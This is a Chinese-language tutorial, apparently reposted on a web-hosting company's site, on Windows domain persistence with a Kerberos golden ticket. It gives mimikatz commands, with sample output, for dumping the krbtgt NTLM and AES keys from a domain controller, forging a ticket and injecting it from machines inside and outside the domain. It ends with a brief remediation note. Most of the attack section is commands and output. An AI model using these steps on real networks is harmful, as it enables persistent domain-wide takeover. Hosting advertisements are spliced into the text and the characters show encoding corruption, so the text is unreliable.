0x00 前言

---

當(dāng)域***成功后，域控制器已被攻陷，這時(shí)***者通常需要維持域中權(quán)限，持久控制域控制器。本文中提到的golden ticket（黃金票據(jù)）主要是利用微軟Kerberos協(xié)議缺陷和域中krbtgt賬號(hào)的信息，可生成任意TGT，該TGT可用于當(dāng)前域中Kerberos認(rèn)證的任何服務(wù)。***者只需要保存krbtgt賬號(hào)中的信息生成golden ticket注入內(nèi)存當(dāng)中，即可擁有權(quán)限，且該票據(jù)的有效期是十年。

懷安網(wǎng)站制作公司哪家好，找創(chuàng)新互聯(lián)！從網(wǎng)頁(yè)設(shè)計(jì)、網(wǎng)站建設(shè)、微信開(kāi)發(fā)、APP開(kāi)發(fā)、成都響應(yīng)式網(wǎng)站建設(shè)等網(wǎng)站項(xiàng)目制作，到程序開(kāi)發(fā)，運(yùn)營(yíng)維護(hù)。創(chuàng)新互聯(lián)于2013年創(chuàng)立到現(xiàn)在10年的時(shí)間，我們擁有了豐富的建站經(jīng)驗(yàn)和運(yùn)維經(jīng)驗(yàn)，來(lái)保證我們的工作的順利進(jìn)行。專注于網(wǎng)站建設(shè)就選創(chuàng)新互聯(lián)。

0x01 準(zhǔn)備工作

---

1. 域控制器一臺(tái)及管理員權(quán)限（dc都沒(méi)攻陷，談何后續(xù)？）
2. mimikatz

0x02 模擬環(huán)境

---

域控制器 2008r2 dc.test.com 192.168.3.100
域內(nèi)機(jī)器 2008r2 client.test.com 192.168.3.10
域外機(jī)器 win7 xxxxxx.xxx 192.168.3.18

0x03 漏洞自檢

---

只能去翻看日志咯～～～～

0x04 漏洞利用

---

1. 獲取krbtgt賬號(hào)信息

包括Server SID、NTLM或aes256或aes128，在域控制器上使用mimikatz操作

C:\Users\Administrator\Desktop>mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "exit"
mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::lsa /patch
Domain : TEST / S-1-5-21-1406004368-3818689962-3591297438
RID  : 000001f6 (502)
User : krbtgt
LM   : 
NTLM : 80c073620041d7cc60c36ea12bdecb5d
//只摘重點(diǎn)部分展示

抓取aes256，需要使用另外的命令，aes256和NTLM只需要一個(gè)即可

C:\Users\Administrator\Desktop>mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:test.com /user:krbtgt" "exit"
mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /domain:test.com /user:krbtgt
[DC] 'test.com' will be the domain
[DC] 'dc.test.com' will be the DC server
[DC] 'krbtgt' will be the user account
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : TEST.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 7a615ae0d4b62a304ab086749b87ec0933dccb62c15e9fc2ca176bd4cf5ee8c5
            aes128_hmac       (4096) : aeb64a10f1fa77b344fb873ba04fa755
      des_cbc_md5       (4096) : dcd9ec620b26f7df
      rc4_plain         (4096) : 80c073620041d7cc60c36ea12bdecb5d

2.生成golden ticket（其實(shí)也是TGT票據(jù)）

先使用NTLM來(lái)生成票據(jù)

C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:域名 /sid:SERVER SID /krbtgt:NTLM /ticket:test.kirbi" "exit"

執(zhí)行后會(huì)在當(dāng)前目錄生成票據(jù)，名為test.kirbi

aes256生成票據(jù)

C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:域名 /sid:SERVER SID /aes256:值 /ticket:xxx.kirbi" "exit"

執(zhí)行后會(huì)在當(dāng)前目錄生成票據(jù)，名為xxx.kirbi
aes128同256，將參數(shù)名修改和值即可/aes128:xxx

3.票據(jù)注入

分別使用兩臺(tái)機(jī)器進(jìn)行測(cè)試，一臺(tái)為域內(nèi)成員機(jī)器，一臺(tái)為域外成員機(jī)器，測(cè)試是否能通過(guò)票據(jù)使任意能聯(lián)通域的機(jī)器獲取到域管理權(quán)限！將票據(jù)保存到兩臺(tái)機(jī)器上

* 域內(nèi)機(jī)器測(cè)試

！未注入票據(jù)前，域內(nèi)機(jī)器不能直接訪問(wèn)域控制器

mimikatz # kerberos::ptt aes256.kirbi  #xxx.kirbi為文件名

！注入票據(jù)后，成功訪問(wèn)域控制器

---

* 域外機(jī)器測(cè)試

需要注意的是，域外機(jī)器先得將dns指向域控制器或域內(nèi)dns服務(wù)器，否則無(wú)法解析主機(jī)名

可以正常解析！

機(jī)器不在域中
！未注入票據(jù)前，域外機(jī)器不能直接訪問(wèn)域控制器

！注入票據(jù)后，域外機(jī)器成功訪問(wèn)域控制器

0x05 細(xì)節(jié)

---

1. 訪問(wèn)時(shí)，不能使用ip地址，必須使用域名
   
2. 如有錯(cuò)誤，請(qǐng)斧正，謝謝！

0x06 修復(fù)

當(dāng)域被***后，不止要重置域管理員密碼，還需要重置krbtgt賬戶密碼，且需要重置兩次，才能使golden ticket失效，否則擁有g(shù)olden ticket的***者將可以隨便進(jìn)出域中

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務(wù)器15元起步，三天無(wú)理由+7*72小時(shí)售后在線，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性價(jià)比高”等特點(diǎn)與優(yōu)勢(shì)，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應(yīng)用場(chǎng)景需求。

網(wǎng)頁(yè)題目：域后續(xù)之goldenticket-創(chuàng)新互聯(lián)
網(wǎng)頁(yè)URL：http://weahome.cn/article/deeshp.html